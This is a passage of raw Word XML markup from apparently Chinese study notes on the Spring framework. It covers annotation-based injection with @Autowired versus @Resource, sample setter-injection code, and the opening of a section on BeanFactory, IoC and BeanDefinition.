          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xmlns:xsi</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"http://www.w3.org/2001/XMLSchema-instance"</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000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xmlns:context</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"http://www.springframework.org/schema/context"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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xsi:schemaLocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"http://www.springframework.org/schema/beans</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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://www.springframework.org/schema/beans/spring-beans-2.5.xsd</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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://www.springframework.org/schema/context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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       http://www.springframework.org/schema/context/spring-context-2.5.xsd"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&gt;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000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;context:annotation-config /&gt;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000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/beans&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>代码中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注解方式进行装配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二者区别</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: @Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认按类型装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, @Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认按名称装配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当找不到与名称匹配的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>才会按类型匹配</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>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@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>配置在属性上</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> PersonDao personDao;</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@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(name=</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"personDao"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>名称通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性指定</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> PersonDao personDao;</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@Resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>配置在</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>方法上</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> setPersonDao(PersonDao personDao)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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.personDao = personDao;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szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342FA7" w:rsidRDefault="00342FA7" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342FA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/zdp072/article/details/25558563?utm_source=tuicool&amp;utm_medium=referral</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRDefault="00DA54D7" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId227" w:history="1">
        <w:r w:rsidR="00541643" w:rsidRPr="007145E7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.tuicool.com/articles/EJf2Qbn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00657711" w:rsidRDefault="00657711" w:rsidP="00657711">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4.1.4 </w:t>
      </w:r>
      <w:r w:rsidR="00333BD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r w:rsidR="00333BD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00333BD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanPostProcessor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541643" w:rsidRDefault="001A35F2" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是解耦组件之间复杂关系的利器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A35F2" w:rsidRDefault="001A35F2" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入实现：接口注入、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入、构造器注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A35F2" w:rsidRDefault="00DE6F34" w:rsidP="00134F57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r w:rsidR="001A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器实现方式：</w:t>
      </w:r>
      <w:r w:rsidR="001A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r w:rsidR="001A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的简单容器系列，容器的最基本功能；</w:t>
      </w:r>
      <w:r w:rsidR="001A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidR="001A35F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用上下文，容器的高级形态而存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE6F34" w:rsidRDefault="00DE6F34" w:rsidP="006354B1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00076C48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00076C48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>来管理基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00076C48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00076C48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的应用中的各种对象以及它们之间的相互依赖关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
